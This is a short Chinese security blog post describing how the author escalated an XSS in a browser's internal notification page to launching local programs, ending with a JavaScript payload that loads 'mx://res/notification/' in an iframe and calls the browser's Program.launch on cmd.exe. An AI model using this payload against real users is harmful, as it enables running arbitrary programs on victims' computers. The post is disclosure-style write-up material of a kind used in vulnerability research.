最新消息:

我是如何从一个xss到某某浏览器的远程命令执行

WEB安全 Mat 96815浏览 0评论

0x01

前言:其实我是个小白平时就喜欢瞎搞,无意间碰到一个浏览器就想一探究竟,好了废话不多说开始!!!

0x02

可以看到我打开的新标签是怎么一个链接页面,既然是页面我是不可以XSS它呢?

于是我就打开了控制器输入XSS代码如下图:

输入payload发现能成功弹窗,我们来假设如果这个浏览器的本地域既然能弹XSS是不可以弹出其他的呢?

没错确实能弹出其他的,如图:

没错我弹出了他的CMD窗口,我们来ipconfig一下

可以看到成功弹出了,我们再来弹出它的计算器试试如图:

是不是很神奇就出来了,哈哈!!!!

 

奉上payload:

var s=document.createElement(“iframe”);s.src=”mx://res/notification/”;s.onload=function()

{s.contentWindow.maxthon.program.Program.launch(“C:/windows/system32/cmd.exe”,””)};document.body.appendChild(s);

 

0x03

运气而已,纯属瞎搞……   我始终是那个纯情的小Mat,小白菜,小渣渣。希望大家多多支持我,帮助我谢谢!!!!

由于安全原因,命令执行那里就不详细说明了,希望大家谅解! 

本文内容归Mat所有,未经允许严禁转载!

转载请注明:即刻安全 » 我是如何从一个xss到某某浏览器的远程命令执行

您必须 登录 才能发表评论!



合作伙伴